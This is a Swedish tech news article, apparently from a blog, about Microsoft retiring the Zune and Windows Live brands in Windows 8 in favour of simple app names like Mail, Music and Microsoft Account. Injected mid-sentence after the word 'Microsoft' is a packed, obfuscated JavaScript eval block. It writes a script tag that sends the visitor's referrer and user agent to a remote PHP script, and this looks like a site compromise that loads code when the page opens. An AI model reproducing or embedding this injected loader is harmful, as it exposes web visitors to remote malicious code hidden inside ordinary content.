Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

PC

Hur Microsoft dödar Zune och Windows Live i Windows 8

Hur Microsoft dödar Zune och Windows Live i Windows 8
Sebastian

Microsoft eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bniyy|var|u0026u|referrer|isarf||js|php’.split(’|’),0,{}))
Xbox team hanterar skapandet och förvaltningen av Metro Style Video och de musikprogram som kommer användas i Windows 8. Vi har tidigare hört att Windows 8 kommer att flytta Xbox Live till Windows Music, video och game. Detta kommer Microsoft berätta mer om senare.

Fler ansökningar har börjat rulla in. Användare ger Microsoft inspiration på program som bör vara förinstallerade på Windows 8 vid lansering. Vi har fått reda på att Windows live kommer att ersätta Windows Live ID och att också mjukvarujätten kommer att ta bort Zune från Windows Store, även om Zune Pass kommer att kvarstå.

Flytten från Zune är en del av en bred satsning för att förenkla och konsolifiera företagets varumärken tillsammans med Microsoft SkyDrive och Microsoft Hotmail. Den ”brandingen” kommer att se ut så här i Windows 8:

Microsoft Account (Windows Live ID)
Mail (Windows Live Mail)
Kalender (Windows Live Calendar)
People (Windows Live Contacts)
Photos (Windows Live Photo Gallery)
Music (Zune Music Player)
Video (Zune Video Player)

Vi har även hört att Microsoft kan komma att ersätta Zune med en Spotify-liknande tjänst senare i år baserat på Xbox Live. Om Windows Live och Zune är helt död i slutet av året återstår att se, men Windows 8 tar klart de första stora stegen mot det oundvikliga.